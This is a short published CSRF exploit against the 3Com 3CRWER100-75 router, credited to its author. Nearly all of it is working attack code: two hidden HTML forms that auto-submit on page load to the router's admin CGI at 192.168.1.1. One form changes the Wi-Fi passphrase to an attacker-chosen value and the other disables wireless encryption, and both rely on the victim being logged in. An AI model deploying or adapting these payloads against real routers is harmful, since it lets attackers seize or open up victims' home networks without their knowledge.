##########################################################
# Exploit Name : CSRF - 3Com rooter - 3CRWER100-75 #
# Author : gabry9191 #
# Website : http://gabry9191.altervista.org/ #
# E-Mail : info-gabry9191@autistici.org #
##############################################################
# #
# This exploit work only if the user is logged to the rooter #
# #
##############################################################
# Change wi-fi password #
#########################
<form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe">
<input type="hidden" value="document.location.href='wireless_wpa_psk.stm';" name="nextPage"></input>
<input type="hidden" value="Location: /wireless_wpa_psk.stm" name="nextPage2"></input>
<input name="changewep" value="0">
<input name="wpa_en" value="1">
<input name="wpa_authen" value="1">
<input name="w802_rekey" value="2">
<input name="wsec_mode" value="2">
<input name="wpa_mode" value="2">
<input name="Cypher_suite" value="2">
<input name="wpa_psk" value="0">
<input name="sharedkey" value="[PASSWORD-WI-FI]">
<input name="sharedkey1" value="[PASSWORD-WI-FI]">
<input name="obscurePSK" value="1">
</form>
<script>document.body.onload = document.forms[0].submit();</script>
##########################
# Disable wi-fi password #
##########################
<form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe">
<input name="changewep" value="0">
<input name="wsec_mode" value="1">
</form>
<script>document.body.onload = document.forms[0].submit();</script>